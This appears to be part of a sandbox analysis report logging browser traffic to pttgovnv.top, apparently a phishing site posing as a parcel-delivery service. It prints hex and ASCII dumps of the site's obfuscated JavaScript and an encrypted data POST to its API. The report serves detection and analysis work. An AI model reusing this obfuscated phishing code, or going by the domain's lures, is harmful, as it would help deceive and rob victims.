          Data Ascii: ','toString','noticeList','72476SXBCoJ','trackTitle','\x20*date*\x20\x27d','Your\x20packa','next','ate\x20your\x20a','Delivery\x20F','search','Paket\x20Numa','9063747gdVJYB','1738296kfffNr','umu','\x20again\x20on\x20','prevent','Ltfen\x20adr','red','toL
          2024-09-01 22:25:17 UTC1369INData Raw: 27 69 6e 67 5c 78 32 30 6e 75 6d 62 65 72 27 2b 61 32 36 5f 30 78 32 66 36 62 32 65 28 30 78 31 61 63 29 7d 2c 27 6e 6f 74 69 63 65 27 3a 7b 27 64 65 66 61 75 6c 74 27 3a 61 32 36 5f 30 78 32 66 36 62 32 65 28 30 78 31 38 32 29 2b 61 32 36 5f 30 78 32 66 36 62 32 65 28 30 78 31 36 35 29 2b 61 32 36 5f 30 78 32 66 36 62 32 65 28 30 78 31 37 35 29 7d 2c 27 6e 6f 74 69 63 65 4c 69 73 74 27 3a 7b 27 64 65 66 61 75 6c 74 27 28 29 7b 63 6f 6e 73 74 20 5f 30 78 35 37 63 32 32 65 3d 61 32 36 5f 30 78 32 66 36 62 32 65 3b 72 65 74 75 72 6e 5b 27 59 6f 75 72 5c 78 32 30 70 61 63 6b 61 27 2b 5f 30 78 35 37 63 32 32 65 28 30 78 31 61 34 29 2b 5f 30 78 35 37 63 32 32 65 28 30 78 31 39 34 29 2b 5f 30 78 35 37 63 32 32 65 28 30 78 31 39 62 29 2b 5f 30 78 35 37 63 32 32
          Data Ascii: 'ing\x20number'+a26_0x2f6b2e(0x1ac)},'notice':{'default':a26_0x2f6b2e(0x182)+a26_0x2f6b2e(0x165)+a26_0x2f6b2e(0x175)},'noticeList':{'default'(){const _0x57c22e=a26_0x2f6b2e;return['Your\x20packa'+_0x57c22e(0x1a4)+_0x57c22e(0x194)+_0x57c22e(0x19b)+_0x57c22
          2024-09-01 22:25:17 UTC1369INData Raw: 5b 65 28 27 68 31 27 2c 44 2c 61 32 36 5f 30 78 31 64 34 63 66 30 28 5f 30 78 34 32 33 35 34 39 5b 5f 30 78 34 39 31 31 38 66 28 30 78 31 61 37 29 5d 29 2c 30 78 31 29 2c 49 2c 65 28 5f 30 78 34 39 31 31 38 66 28 30 78 31 61 32 29 2c 7a 2c 5b 65 28 27 70 27 2c 6e 75 6c 6c 2c 61 32 36 5f 30 78 31 64 34 63 66 30 28 5f 30 78 34 32 33 35 34 39 5b 5f 30 78 34 39 31 31 38 66 28 30 78 31 37 64 29 5d 5b 5f 30 78 34 39 31 31 38 66 28 30 78 31 39 35 29 5d 28 5f 30 78 34 39 31 31 38 66 28 30 78 31 36 61 29 2c 75 28 5f 30 78 31 39 65 39 30 61 29 29 29 2c 30 78 31 29 2c 65 28 27 70 27 2c 77 2c 5b 65 28 27 62 27 2c 6e 75 6c 6c 2c 61 32 36 5f 30 78 31 64 34 63 66 30 28 5f 30 78 34 32 33 35 34 39 5b 5f 30 78 34 39 31 31 38 66 28 30 78 31 37 34 29 5d 29 2c 30 78 31 29 5d
          Data Ascii: [e('h1',D,a26_0x1d4cf0(_0x423549[_0x49118f(0x1a7)]),0x1),I,e(_0x49118f(0x1a2),z,[e('p',null,a26_0x1d4cf0(_0x423549[_0x49118f(0x17d)][_0x49118f(0x195)](_0x49118f(0x16a),u(_0x19e90a))),0x1),e('p',w,[e('b',null,a26_0x1d4cf0(_0x423549[_0x49118f(0x174)]),0x1)]
          2024-09-01 22:25:17 UTC17INData Raw: 7b 47 20 61 73 20 64 65 66 61 75 6c 74 7d 3b 0d 0a
          Data Ascii: {G as default};
          2024-09-01 22:25:17 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          20192.168.2.449758172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:17 UTC622OUTPOST /api/MC4zMDIxMDgwNzc2NjI2MDU5NA== HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          Content-Length: 292
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-platform: "Windows"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Content-Type: text/encrypt
          Accept: */*
          Origin: https://pttgovnv.top
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:17 UTC292OUTData Raw: 55 32 46 73 64 47 56 6b 58 31 2f 69 55 5a 68 38 44 37 4d 41 57 69 4c 2b 67 52 4d 75 71 46 6f 77 70 35 46 2f 68 33 7a 6c 4c 4a 59 36 48 46 76 69 53 62 49 4d 6c 74 54 69 66 73 6b 46 59 68 42 42 4a 54 6f 57 56 73 4d 73 61 72 4f 70 6c 42 59 2b 30 52 57 35 78 79 42 76 74 49 67 50 42 35 31 79 69 45 4a 46 37 4c 62 45 6f 2b 53 71 31 77 63 33 36 38 55 33 43 4e 4e 55 64 71 54 67 54 6f 52 4a 73 37 61 47 66 30 71 39 37 39 67 69 6f 56 5a 73 68 5a 79 41 45 7a 51 78 54 39 68 51 64 5a 47 6f 75 65 2b 44 59 4f 76 32 39 62 66 58 41 79 6f 78 37 46 52 7a 4d 6d 6e 58 70 5a 7a 32 78 30 78 4b 53 6f 6e 75 35 52 58 6c 6f 34 6f 57 68 6c 51 31 4f 33 39 4c 70 63 67 37 6b 41 69 36 6f 52 72 67 69 6f 6b 78 4e 5a 52 35 70 6a 4a 55 44 61 39 42 38 4c 6b 42 4f 47 41 48 39 43 39 67 4f 4b 7a
          Data Ascii: U2FsdGVkX1/iUZh8D7MAWiL+gRMuqFowp5F/h3zlLJY6HFviSbIMltTifskFYhBBJToWVsMsarOplBY+0RW5xyBvtIgPB51yiEJF7LbEo+Sq1wc368U3CNNUdqTgToRJs7aGf0q979gioVZshZyAEzQxT9hQdZGoue+DYOv29bfXAyox7FRzMmnXpZz2x0xKSonu5RXlo4oWhlQ1O39Lpcg7kAi6oRrgiokxNZR5pjJUDa9B8LkBOGAH9C9gOKz
          2024-09-01 22:25:18 UTC677INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:18 GMT
          Content-Type: application/json; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Access-Control-Allow-Origin: *
          ETag: W/"600-DJ88d3NvKzktDG8LJr2VeLggELo"
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fbet9MrfNGphZMfFs26%2B5zkgawfQfJVBgH91ZpeHUoFldMwcmKBdcFJgE9J7KaxUDiTeVbnkfOp7cFiutGogdqVoj1o%2B9QlacJu1d%2BSusJYfI%2ByMP9nH670hQiDaTus%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ace6fbcf0ca5-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:18 UTC692INData Raw: 36 30 30 0d 0a 55 32 46 73 64 47 56 6b 58 31 38 48 77 67 72 6c 6d 73 39 77 53 79 2b 4a 4d 43 51 34 77 2b 31 37 35 51 34 61 72 55 45 47 71 76 77 52 36 43 75 4b 37 38 51 6f 4e 51 77 54 37 66 5a 72 4e 5a 34 61 49 6a 7a 31 32 54 59 39 35 45 48 37 70 74 71 72 6b 68 30 31 71 56 61 46 47 37 73 36 45 72 44 51 6c 74 39 4f 5a 5a 71 48 6d 69 36 61 64 4b 66 48 2f 36 44 45 44 30 67 37 42 4e 64 46 4b 78 53 52 30 59 56 45 74 69 54 6c 57 47 77 7a 6f 71 4a 64 79 2b 6f 74 45 77 37 65 6a 70 71 54 49 64 30 65 30 37 6f 79 66 6e 4d 53 6a 73 49 75 47 32 33 6a 70 44 52 66 6d 49 4c 70 43 69 77 62 4b 7a 37 67 4f 4f 79 64 34 78 6a 4d 34 53 63 37 47 55 2b 4a 4c 5a 79 4e 4e 5a 71 63 52 74 41 6a 78 48 41 44 49 39 75 35 61 74 41 77 74 4f 65 58 43 6c 38 6b 56 65 34 6a 68 30 35 53 77 33
          Data Ascii: 600U2FsdGVkX18Hwgrlms9wSy+JMCQ4w+175Q4arUEGqvwR6CuK78QoNQwT7fZrNZ4aIjz12TY95EH7ptqrkh01qVaFG7s6ErDQlt9OZZqHmi6adKfH/6DED0g7BNdFKxSR0YVEtiTlWGwzoqJdy+otEw7ejpqTId0e07oyfnMSjsIuG23jpDRfmILpCiwbKz7gOOyd4xjM4Sc7GU+JLZyNNZqcRtAjxHADI9u5atAwtOeXCl8kVe4jh05Sw3
          2024-09-01 22:25:18 UTC851INData Raw: 78 63 4e 30 48 61 6b 68 37 6e 72 4c 36 4f 76 6c 73 32 4e 75 55 78 67 46 52 65 75 2b 4b 68 79 57 39 6e 51 54 64 35 64 34 46 6d 5a 59 39 49 70 41 31 57 39 71 78 70 36 37 32 31 30 55 63 67 45 44 6e 67 77 36 73 72 54 32 53 34 52 45 7a 31 50 2f 4c 4b 38 6f 5a 48 76 56 50 67 74 4b 39 42 45 73 4d 69 68 63 63 38 41 67 70 57 4c 4b 70 4b 77 31 6b 30 54 4a 7a 6c 4b 4e 35 61 4c 76 74 52 41 45 6b 47 2f 59 71 77 4e 72 7a 59 39 78 38 37 2f 51 45 74 75 55 63 45 6e 7a 55 6a 71 74 38 71 37 50 36 68 4d 45 79 31 73 70 64 4a 30 50 5a 5a 69 4c 73 55 46 55 49 44 43 4f 70 6d 56 58 77 78 6d 54 4f 74 57 37 72 2b 2b 79 54 53 41 51 39 75 49 2b 44 34 51 7a 55 36 65 73 73 44 47 67 61 2f 38 43 42 47 41 39 57 63 64 4d 4a 35 4d 75 62 73 2b 39 5a 31 6d 76 6f 53 59 38 68 32 30 61 68 46 30
          Data Ascii: xcN0Hakh7nrL6Ovls2NuUxgFReu+KhyW9nQTd5d4FmZY9IpA1W9qxp67210UcgEDngw6srT2S4REz1P/LK8oZHvVPgtK9BEsMihcc8AgpWLKpKw1k0TJzlKN5aLvtRAEkG/YqwNrzY9x87/QEtuUcEnzUjqt8q7P6hMEy1spdJ0PZZiLsUFUIDCOpmVXwxmTOtW7r++yTSAQ9uI+D4QzU6essDGga/8CBGA9WcdMJ5Mubs+9Z1mvoSY8h20ahF0
          2024-09-01 22:25:18 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          21192.168.2.449759172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:20 UTC532OUTGET /help/assets/0e738ae1JxKnW.js HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Origin: https://pttgovnv.top
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: */*
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: script
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:20 UTC757INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:20 GMT
          Content-Type: application/javascript; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:42 GMT
          ETag: W/"1b7a6-18fc3d84650"
          CF-Cache-Status: HIT
          Age: 36229
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yYOJQachRO%2BJjSaoEsWIjpzkTGAY7N0h2MODlpWXxf%2FYk2WtqybfAyV2oFjv5OfBvwcKcr4I8T4Bcf4rdLvyZ9uTc9Z3c7tEiVaFbMiNFpVmsvfjsZzN0TCo6hEu2l4%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8acf46cb943cf-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:20 UTC612INData Raw: 37 63 62 61 0d 0a 63 6f 6e 73 74 20 61 31 5f 30 78 35 34 31 34 36 61 3d 61 31 5f 30 78 31 61 33 33 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 35 30 31 39 61 2c 5f 30 78 34 62 64 31 65 66 29 7b 63 6f 6e 73 74 20 5f 30 78 34 61 64 31 34 66 3d 61 31 5f 30 78 31 61 33 33 2c 5f 30 78 34 66 30 39 64 66 3d 5f 30 78 31 35 30 31 39 61 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 32 33 61 65 64 36 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 31 34 66 28 30 78 31 63 30 29 29 2f 30 78 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 31 34 66 28 30 78 31 64 32 29 29 2f 30 78 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 31 34 66 28 30 78 31 65 31 29 29 2f 30 78 33 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78
          Data Ascii: 7cbaconst a1_0x54146a=a1_0x1a33;(function(_0x15019a,_0x4bd1ef){const _0x4ad14f=a1_0x1a33,_0x4f09df=_0x15019a();while(!![]){try{const _0x23aed6=parseInt(_0x4ad14f(0x1c0))/0x1*(-parseInt(_0x4ad14f(0x1d2))/0x2)+-parseInt(_0x4ad14f(0x1e1))/0x3*(parseInt(_0x
          2024-09-01 22:25:20 UTC1369INData Raw: 63 74 69 6f 6e 28 29 7b 6c 65 74 20 5f 30 78 32 64 30 33 63 33 3d 21 21 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 37 64 66 66 39 63 2c 5f 30 78 35 32 65 33 63 38 29 7b 63 6f 6e 73 74 20 5f 30 78 33 64 32 39 37 63 3d 5f 30 78 32 64 30 33 63 33 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 31 35 33 30 37 31 3d 61 31 5f 30 78 31 61 33 33 3b 69 66 28 5f 30 78 35 32 65 33 63 38 29 7b 63 6f 6e 73 74 20 5f 30 78 33 33 32 37 36 66 3d 5f 30 78 35 32 65 33 63 38 5b 5f 30 78 31 35 33 30 37 31 28 30 78 33 36 64 29 5d 28 5f 30 78 37 64 66 66 39 63 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78 35 32 65 33 63 38 3d 6e 75 6c 6c 2c 5f 30 78 33 33 32 37 36 66 3b 7d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 72
          Data Ascii: ction(){let _0x2d03c3=!![];return function(_0x7dff9c,_0x52e3c8){const _0x3d297c=_0x2d03c3?function(){const _0x153071=a1_0x1a33;if(_0x52e3c8){const _0x33276f=_0x52e3c8[_0x153071(0x36d)](_0x7dff9c,arguments);return _0x52e3c8=null,_0x33276f;}}:function(){};r
          2024-09-01 22:25:20 UTC1369INData Raw: 3d 5f 30 78 32 31 35 61 66 64 3d 3e 74 79 70 65 6f 66 20 41 72 72 61 79 42 75 66 66 65 72 5b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 33 31 64 29 5d 3d 3d 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 33 38 37 29 3f 41 72 72 61 79 42 75 66 66 65 72 5b 27 69 73 56 69 65 77 27 5d 28 5f 30 78 32 31 35 61 66 64 29 3a 5f 30 78 32 31 35 61 66 64 26 26 5f 30 78 32 31 35 61 66 64 5b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 31 36 32 29 5d 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 42 75 66 66 65 72 2c 65 65 3d 28 7b 74 79 70 65 3a 5f 30 78 32 64 38 37 61 62 2c 64 61 74 61 3a 5f 30 78 33 62 36 30 65 31 7d 2c 5f 30 78 34 64 30 35 38 31 2c 5f 30 78 34 36 62 61 62 32 29 3d 3e 41 65 26 26 5f 30 78 33 62 36 30 65 31 20 69 6e 73 74 61 6e 63 65 6f 66 20 42 6c 6f 62 3f
          Data Ascii: =_0x215afd=>typeof ArrayBuffer[a1_0x54146a(0x31d)]==a1_0x54146a(0x387)?ArrayBuffer['isView'](_0x215afd):_0x215afd&&_0x215afd[a1_0x54146a(0x162)]instanceof ArrayBuffer,ee=({type:_0x2d87ab,data:_0x3b60e1},_0x4d0581,_0x46bab2)=>Ae&&_0x3b60e1 instanceof Blob?
          2024-09-01 22:25:20 UTC1369INData Raw: 65 65 28 5f 30 78 31 66 38 37 32 35 2c 21 30 78 31 2c 5f 30 78 35 31 33 35 39 65 3d 3e 7b 24 7c 7c 28 24 3d 6e 65 77 20 54 65 78 74 45 6e 63 6f 64 65 72 28 29 29 2c 5f 30 78 33 64 37 33 35 34 28 24 5b 27 65 6e 63 6f 64 65 27 5d 28 5f 30 78 35 31 33 35 39 65 29 29 3b 7d 29 3b 7d 63 6f 6e 73 74 20 75 65 3d 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 32 61 34 29 2b 27 4b 4c 4d 4e 4f 50 51 52 53 54 27 2b 27 55 56 57 58 59 5a 61 62 63 64 27 2b 27 65 66 67 68 69 6a 6b 6c 6d 6e 27 2b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 32 62 61 29 2b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 32 33 62 29 2b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 32 31 32 29 2c 78 3d 74 79 70 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 3e 27 75 27 3f 5b 5d 3a 6e 65 77 20 55 69 6e 74 38 41 72
          Data Ascii: ee(_0x1f8725,!0x1,_0x51359e=>{$||($=new TextEncoder()),_0x3d7354($['encode'](_0x51359e));});}const ue=a1_0x54146a(0x2a4)+'KLMNOPQRST'+'UVWXYZabcd'+'efghijklmn'+a1_0x54146a(0x2ba)+a1_0x54146a(0x23b)+a1_0x54146a(0x212),x=typeof Uint8Array>'u'?[]:new Uint8Ar
          2024-09-01 22:25:20 UTC1369INData Raw: 28 5f 30 78 33 36 61 39 39 62 2c 5f 30 78 37 62 62 31 33 33 29 7d 3b 63 6f 6e 73 74 20 5f 30 78 37 31 36 30 31 36 3d 5f 30 78 33 36 61 39 39 62 5b 5f 30 78 31 37 65 38 35 30 28 30 78 33 32 32 29 5d 28 30 78 30 29 3b 72 65 74 75 72 6e 20 5f 30 78 37 31 36 30 31 36 3d 3d 3d 27 62 27 3f 7b 27 74 79 70 65 27 3a 27 6d 65 73 73 61 67 65 27 2c 27 64 61 74 61 27 3a 4b 65 28 5f 30 78 33 36 61 39 39 62 5b 27 73 75 62 73 74 72 69 6e 67 27 5d 28 30 78 31 29 2c 5f 30 78 37 62 62 31 33 33 29 7d 3a 49 5b 5f 30 78 37 31 36 30 31 36 5d 3f 5f 30 78 33 36 61 39 39 62 5b 5f 30 78 31 37 65 38 35 30 28 30 78 33 31 34 29 5d 3e 30 78 31 3f 7b 27 74 79 70 65 27 3a 49 5b 5f 30 78 37 31 36 30 31 36 5d 2c 27 64 61 74 61 27 3a 5f 30 78 33 36 61 39 39 62 5b 27 73 75 62 73 74 72 69 6e
          Data Ascii: (_0x36a99b,_0x7bb133)};const _0x716016=_0x36a99b[_0x17e850(0x322)](0x0);return _0x716016==='b'?{'type':'message','data':Ke(_0x36a99b['substring'](0x1),_0x7bb133)}:I[_0x716016]?_0x36a99b[_0x17e850(0x314)]>0x1?{'type':I[_0x716016],'data':_0x36a99b['substrin
          2024-09-01 22:25:20 UTC1369INData Raw: 36 65 28 30 78 33 36 39 29 29 62 72 65 61 6b 3b 7d 72 65 74 75 72 6e 20 5f 30 78 61 64 63 30 37 65 3b 7d 3b 66 75 6e 63 74 69 6f 6e 20 58 65 28 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 54 72 61 6e 73 66 6f 72 6d 53 74 72 65 61 6d 28 7b 27 74 72 61 6e 73 66 6f 72 6d 27 28 5f 30 78 33 63 63 34 66 31 2c 5f 30 78 34 63 30 31 38 39 29 7b 48 65 28 5f 30 78 33 63 63 34 66 31 2c 5f 30 78 34 37 33 36 35 38 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 34 37 34 65 65 37 3d 61 31 5f 30 78 31 61 33 33 2c 5f 30 78 34 31 36 37 31 30 3d 5f 30 78 34 37 33 36 35 38 5b 5f 30 78 34 37 34 65 65 37 28 30 78 33 31 34 29 5d 3b 6c 65 74 20 5f 30 78 31 62 65 35 38 32 3b 69 66 28 5f 30 78 34 31 36 37 31 30 3c 30 78 37 65 29 5f 30 78 31 62 65 35 38 32 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61
          Data Ascii: 6e(0x369))break;}return _0xadc07e;};function Xe(){return new TransformStream({'transform'(_0x3cc4f1,_0x4c0189){He(_0x3cc4f1,_0x473658=>{const _0x474ee7=a1_0x1a33,_0x416710=_0x473658[_0x474ee7(0x314)];let _0x1be582;if(_0x416710<0x7e)_0x1be582=new Uint8Arra
          2024-09-01 22:25:20 UTC1369INData Raw: 5d 2c 5f 30 78 33 66 33 30 38 30 3d 3d 3d 5f 30 78 31 32 32 31 30 65 5b 30 78 30 5d 5b 5f 30 78 31 33 34 33 34 37 28 30 78 33 31 34 29 5d 26 26 28 5f 30 78 31 32 32 31 30 65 5b 5f 30 78 31 33 34 33 34 37 28 30 78 32 65 31 29 5d 28 29 2c 5f 30 78 33 66 33 30 38 30 3d 30 78 30 29 3b 72 65 74 75 72 6e 20 5f 30 78 31 32 32 31 30 65 5b 27 6c 65 6e 67 74 68 27 5d 26 26 5f 30 78 33 66 33 30 38 30 3c 5f 30 78 31 32 32 31 30 65 5b 30 78 30 5d 5b 5f 30 78 31 33 34 33 34 37 28 30 78 33 31 34 29 5d 26 26 28 5f 30 78 31 32 32 31 30 65 5b 30 78 30 5d 3d 5f 30 78 31 32 32 31 30 65 5b 30 78 30 5d 5b 5f 30 78 31 33 34 33 34 37 28 30 78 32 66 65 29 5d 28 5f 30 78 33 66 33 30 38 30 29 29 2c 5f 30 78 34 36 37 36 32 30 3b 7d 66 75 6e 63 74 69 6f 6e 20 51 65 28 5f 30 78 31 36
          Data Ascii: ],_0x3f3080===_0x12210e[0x0][_0x134347(0x314)]&&(_0x12210e[_0x134347(0x2e1)](),_0x3f3080=0x0);return _0x12210e['length']&&_0x3f3080<_0x12210e[0x0][_0x134347(0x314)]&&(_0x12210e[0x0]=_0x12210e[0x0][_0x134347(0x2fe)](_0x3f3080)),_0x467620;}function Qe(_0x16
          2024-09-01 22:25:20 UTC1369INData Raw: 38 29 3c 5f 30 78 31 30 38 31 35 31 29 62 72 65 61 6b 3b 63 6f 6e 73 74 20 5f 30 78 35 33 66 66 33 31 3d 44 28 5f 30 78 31 65 65 35 63 38 2c 5f 30 78 31 30 38 31 35 31 29 3b 5f 30 78 32 62 62 61 35 32 5b 5f 30 78 35 32 35 39 66 62 28 30 78 33 38 64 29 5d 28 74 65 28 5f 30 78 35 34 34 33 61 64 3f 5f 30 78 35 33 66 66 33 31 3a 6a 5b 5f 30 78 35 32 35 39 66 62 28 30 78 33 38 33 29 5d 28 5f 30 78 35 33 66 66 33 31 29 2c 5f 30 78 64 39 62 39 33 29 29 2c 5f 30 78 34 61 65 32 64 39 3d 30 78 30 3b 7d 7d 7d 69 66 28 5f 30 78 31 30 38 31 35 31 3d 3d 3d 30 78 30 7c 7c 5f 30 78 31 30 38 31 35 31 3e 5f 30 78 31 36 63 34 34 39 29 7b 5f 30 78 32 62 62 61 35 32 5b 5f 30 78 35 32 35 39 66 62 28 30 78 33 38 64 29 5d 28 57 29 3b 62 72 65 61 6b 3b 7d 7d 7d 7d 29 3b 7d 63 6f
          Data Ascii: 8)<_0x108151)break;const _0x53ff31=D(_0x1ee5c8,_0x108151);_0x2bba52[_0x5259fb(0x38d)](te(_0x5443ad?_0x53ff31:j[_0x5259fb(0x383)](_0x53ff31),_0xd9b93)),_0x4ae2d9=0x0;}}}if(_0x108151===0x0||_0x108151>_0x16c449){_0x2bba52[_0x5259fb(0x38d)](W);break;}}}});}co
          2024-09-01 22:25:20 UTC1369INData Raw: 32 31 30 29 5d 7c 7c 7b 7d 2c 61 72 67 75 6d 65 6e 74 73 5b 5f 30 78 33 63 64 39 33 36 28 30 78 33 31 34 29 5d 3d 3d 30 78 30 29 72 65 74 75 72 6e 20 74 68 69 73 5b 5f 30 78 33 63 64 39 33 36 28 30 78 32 31 30 29 5d 3d 7b 7d 2c 74 68 69 73 3b 76 61 72 20 5f 30 78 35 39 36 35 35 36 3d 74 68 69 73 5b 5f 30 78 33 63 64 39 33 36 28 30 78 32 31 30 29 5d 5b 27 24 27 2b 5f 30 78 33 64 34 63 65 35 5d 3b 69 66 28 21 5f 30 78 35 39 36 35 35 36 29 72 65 74 75 72 6e 20 74 68 69 73 3b 69 66 28 61 72 67 75 6d 65 6e 74 73 5b 5f 30 78 33 63 64 39 33 36 28 30 78 33 31 34 29 5d 3d 3d 30 78 31 29 72 65 74 75 72 6e 20 64 65 6c 65 74 65 20 74 68 69 73 5b 5f 30 78 33 63 64 39 33 36 28 30 78 32 31 30 29 5d 5b 27 24 27 2b 5f 30 78 33 64 34 63 65 35 5d 2c 74 68 69 73 3b 66 6f 72
          Data Ascii: 210)]||{},arguments[_0x3cd936(0x314)]==0x0)return this[_0x3cd936(0x210)]={},this;var _0x596556=this[_0x3cd936(0x210)]['$'+_0x3d4ce5];if(!_0x596556)return this;if(arguments[_0x3cd936(0x314)]==0x1)return delete this[_0x3cd936(0x210)]['$'+_0x3d4ce5],this;for
          2024-09-01 22:25:20 UTC1369INData Raw: 30 78 33 33 64 36 33 35 28 30 78 32 31 30 29 5d 5b 27 24 27 2b 5f 30 78 31 66 35 63 30 35 5d 7c 7c 5b 5d 3b 7d 2c 6c 5b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 32 65 36 29 5d 5b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 33 33 36 29 2b 27 72 73 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 36 31 34 32 34 29 7b 63 6f 6e 73 74 20 5f 30 78 34 35 31 65 63 39 3d 61 31 5f 30 78 35 34 31 34 36 61 3b 72 65 74 75 72 6e 21 21 74 68 69 73 5b 5f 30 78 34 35 31 65 63 39 28 30 78 31 33 39 29 5d 28 5f 30 78 33 36 31 34 32 34 29 5b 5f 30 78 34 35 31 65 63 39 28 30 78 33 31 34 29 5d 3b 7d 3b 63 6f 6e 73 74 20 67 3d 28 28 28 29 3d 3e 74 79 70 65 6f 66 20 73 65 6c 66 3c 27 75 27 3f 73 65 6c 66 3a 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3c 27 75 27 3f 77 69 6e 64 6f 77 3a
          Data Ascii: 0x33d635(0x210)]['$'+_0x1f5c05]||[];},l[a1_0x54146a(0x2e6)][a1_0x54146a(0x336)+'rs']=function(_0x361424){const _0x451ec9=a1_0x54146a;return!!this[_0x451ec9(0x139)](_0x361424)[_0x451ec9(0x314)];};const g=((()=>typeof self<'u'?self:typeof window<'u'?window:


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          22192.168.2.449762104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:20 UTC364OUTGET /help/assets/09bf01f8JxKnW.js HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:20 UTC748INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:20 GMT
          Content-Type: application/javascript; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:42 GMT
          ETag: W/"7ad-18fc3d84650"
          CF-Cache-Status: MISS
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8nZwCkQ6GbmK8CcOxg71J0P0r9anihmP7vXvmB%2BZQo31pXWFN4isgF%2Fl9tpRWRUNW5gIKYP0yTR3CtviA9dEqNpib6vcEM%2Fq5%2BMUrb4RXGJsPNkqfvoy1VJw5jUu02s%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8acf6c99c0f5d-EWR
          alt-svc: h3=":443"; ma=86400
